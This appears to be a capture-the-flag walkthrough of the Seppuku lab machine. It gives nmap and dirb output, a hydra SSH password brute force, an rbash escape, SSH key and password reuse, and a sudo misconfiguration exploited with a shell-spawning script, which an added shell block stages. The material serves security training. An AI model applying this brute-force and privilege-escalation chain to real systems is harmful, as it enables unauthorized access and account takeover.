Proving Ground Play: Seppuku Walkthrough
Embark on an exciting journey through Seppuku:1 Vulnhub challenge. Learn how to uncover hidden secrets, decode keys, and bypass restrictions. Crack passwords, escalate privileges, and claim victory by capturing the final flag. Join us in this cybersecurity adventure and discover the thrill of hacking puzzles.
First things first: run an nmap scan to see which ports are open and which services are listening on them.
Nmap scan report for 192.168.173.90
Host is up (0.16s latency).
Not shown: 57439 closed tcp ports (conn-refused), 8088 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
| 256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_ 256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/empowerid
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_http-title: Did not follow redirect to https://192.168.173.90:7080
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after: 2022-08-11T06:51:35
7601/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: seppuku
| NetBIOS computer name: SEPPUKU\x00
| Domain name: \x00
| FQDN: seppuku
|_ System time: 2023-08-09T08:30:43-04:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-08-09T12:30:46
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.70 seconds
Next we enumerate the host in more depth. Port 7601 serves an Apache site titled "Seppuku", but browsing it manually turns up nothing useful, so the next step is to brute-force its directories with dirb.
dirb http://192.168.173.90:7601/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Aug 9 08:45:17 2023
URL_BASE: http://192.168.173.90:7601/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.173.90:7601/ ----
==> DIRECTORY: http://192.168.173.90:7601/a/
==> DIRECTORY: http://192.168.173.90:7601/b/
==> DIRECTORY: http://192.168.173.90:7601/c/
==> DIRECTORY: http://192.168.173.90:7601/ckeditor/
==> DIRECTORY: http://192.168.173.90:7601/d/
==> DIRECTORY: http://192.168.173.90:7601/database/
==> DIRECTORY: http://192.168.173.90:7601/e/
==> DIRECTORY: http://192.168.173.90:7601/f/
==> DIRECTORY: http://192.168.173.90:7601/h/
+ http://192.168.173.90:7601/index.html (CODE:200|SIZE:171)
==> DIRECTORY: http://192.168.173.90:7601/keys/
==> DIRECTORY: http://192.168.173.90:7601/production/
==> DIRECTORY: http://192.168.173.90:7601/q/
==> DIRECTORY: http://192.168.173.90:7601/r/
==> DIRECTORY: http://192.168.173.90:7601/secret/
+ http://192.168.173.90:7601/server-status (CODE:403|SIZE:281)
(!) FATAL: Too many errors connecting to host
(Possible cause: COULDNT CONNECT)
Note that dirb aborted with "Too many errors connecting to host", so this listing may be incomplete; if the later steps stall, rerun it with a lower request rate or a different tool. Even so, two directories stand out: /keys/ and /secret/.
Browsing /keys/ lists a file named private, which turns out to be an SSH private key. At this point we do not yet know which user it belongs to.
The /secret/ directory holds a password list, password.lst, and a file named hostname whose content is seppuku, which we take as a candidate username.
With the username seppuku in hand, the next step is to brute-force its SSH password with hydra. The natural wordlist is the password.lst file recovered from /secret/ (downloaded locally first):
hydra -l seppuku -P password.lst 192.168.173.90 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-09 08:49:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), ~6 tries per task
[DATA] attacking ssh://192.168.173.90:22/
[22][ssh] host: 192.168.173.90 login: seppuku password: eeyoree
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-09 08:50:42
Hydra reports the password eeyoree, and logging in over SSH with it works. The session, however, lands in a restricted shell (rbash), which blocks things like cd, changing PATH and running commands whose names contain a slash. rbash does not propagate these restrictions to a child shell it is allowed to start, so we can escape by having ssh run an unrestricted bash directly, with --noprofile so the profile scripts that would re-apply a restricted PATH are skipped:
ssh seppuku@192.168.173.90 -t "bash --noprofile"
Listing /home shows three users: tanto, samurai and seppuku. We already hold one password and one SSH private key, so we try the password against the other two accounts over SSH.
It is accepted for samurai.
Recall the private key found under /keys/ during directory brute-forcing. We copy its contents into a local file named sshkey and set its permissions to 600 (ssh refuses to use a key file that other users can read). The key turns out to belong to tanto, and logging in with it (ssh -i sshkey) succeeds.
As tanto, we look for the .cgi_bin directory that the sudo rule for samurai points at (check it with sudo -l), but it does not exist. Since tanto owns the home directory, we simply create .cgi_bin ourselves and save a bash script named bin in it that spawns a shell.
Now it is time to exploit the .cgi_bin program: we log back in as samurai and run the script through sudo. It executes as root and drops us into a root shell, from which we read the root flag and finish the challenge.
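The staging step above, as an added example that is not part of the original walkthrough. It assumes samurai's sudo rule resolves to tanto's home directory plus .cgi_bin/bin (the page does not reproduce the rule itself, so confirm it with sudo -l first); the demonstration runs against a constructed temporary directory instead of /home/tanto.

```shell
# Added example, not code from the original walkthrough. It stages the payload
# that samurai's sudo rule will execute as root. Assumptions (not on the page):
# the rule resolves to <tanto's home>/.cgi_bin/bin and runs it without a
# password prompt; confirm the exact rule with `sudo -l` as samurai first.

# stage_cgi_bin <home>: create <home>/.cgi_bin/bin that execs an interactive bash.
stage_cgi_bin() {
    local home="$1"
    local dir="$home/.cgi_bin"
    mkdir -p "$dir"
    # sudo already runs the script as root, so a plain exec of bash is enough.
    printf '#!/bin/bash\nexec /bin/bash\n' > "$dir/bin"
    # Root only needs read+execute; 755 avoids leaving a world-writable file behind.
    chmod 755 "$dir/bin"
}

# check_cgi_bin <home>: succeed (exit 0) when the payload exists, is executable,
# and begins with the bash shebang the kernel will honour when sudo runs it.
check_cgi_bin() {
    local f="$1/.cgi_bin/bin"
    [ -f "$f" ] && [ -x "$f" ] && [ "$(head -n 1 "$f")" = "#!/bin/bash" ]
}

# Demonstration against a constructed temporary directory rather than /home/tanto.
demo_home="$(mktemp -d)"
stage_cgi_bin "$demo_home"
if check_cgi_bin "$demo_home"; then
    echo "payload staged at $demo_home/.cgi_bin/bin"
fi
rm -rf "$demo_home"
```

On the real target you would call stage_cgi_bin with tanto's home directory while logged in as tanto, then switch to samurai and invoke the script through sudo. Mode 755 is deliberate: the file only needs to be readable and executable by root, and a 777 file is a loud artefact for anyone reviewing the box afterwards.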
We are root. Stay tuned :)